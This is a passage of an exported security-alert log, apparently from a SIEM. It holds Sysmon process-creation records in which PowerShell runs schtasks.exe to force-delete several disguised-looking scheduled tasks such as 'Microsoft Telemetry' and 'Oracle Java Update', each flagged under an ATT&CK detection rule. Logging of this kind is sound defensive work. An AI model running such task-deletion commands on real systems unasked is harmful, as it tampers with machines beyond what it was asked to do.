-NoProfile""}}}", +"May 29, 2020 @ 14:21:07.237",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: 
+RuleName: +UtcTime: 2020-05-28 12:52:39.197 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001024173100} +ProcessId: 5168 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.208645900Z"",""eventRecordID"":""3936"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.197\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001024173100}\r\nProcessId: 5168\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration 
Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.197"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001024173100}"",""processId"":""5168"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.216",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.137 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-00102c153100} +ProcessId: 7996 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.143355400Z"",""eventRecordID"":""3935"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.137\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-00102c153100}\r\nProcessId: 7996\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.137"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-00102c153100}"",""processId"":""7996"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler 
Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.202",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.089 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-00108c133100} +ProcessId: 2312 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.098504000Z"",""eventRecordID"":""3934"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.089\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-00108c133100}\r\nProcessId: 2312\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" 
-Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.089"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-00108c133100}"",""processId"":""2312"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.186",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.012 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001081113100} +ProcessId: 2772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John 
Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.026282700Z"",""eventRecordID"":""3933"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.012\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001081113100}\r\nProcessId: 2772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.012"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001081113100}"",""processId"":""2772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.159",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.873 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010170f3100} +ProcessId: 6348 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.914805200Z"",""eventRecordID"":""3932"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.873\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010170f3100}\r\nProcessId: 6348\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.873"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010170f3100}"",""processId"":""6348"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.140",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.768 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-00108f0c3100} +ProcessId: 7556 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.773162600Z"",""eventRecordID"":""3931"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.768\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-00108f0c3100}\r\nProcessId: 7556\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.768"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-00108f0c3100}"",""processId"":""7556"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.650",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.695 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010ab0a3100} +ProcessId: 6716 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler 